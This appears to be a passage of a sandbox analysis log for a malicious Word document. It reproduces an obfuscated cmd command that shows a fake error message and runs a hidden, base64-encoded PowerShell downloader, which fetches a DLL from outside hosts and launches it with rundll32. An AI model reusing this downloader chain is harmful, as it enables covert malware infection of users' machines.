Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v.....[......0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....\................#.............}..v.....]......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v.....c......0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....d................#.............}..v.....e......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v.....k......0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....l................#.............}..v.....m......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v.....s......0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....t................#.............}..v.....u......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v.....{......0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....|................#.............}..v.....}......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.......K..................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............8.8.'.+.'.V.'.).).`...............#.............}..v............0.N.............8G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....H.................#.............}..v............0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v....p ......0.N.............................|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....(!................#.............}..v.....!......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J`...............#.............}..v.....&......0.N.....................r.......|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....'................#.............}..v....0(......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j.....J`...............#.............}..v.....+......0.N.............8G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....x,................#.............}..v.....,......0.N..............G`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................v.j....E.h...............#.............}..v....@<......0.N...............`.............|............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................v.j....E.h...............#.............}..v.....z......0.N...............`.............|............... Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: Order.doc Virustotal: Detection: 32%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1 Jump to behavior
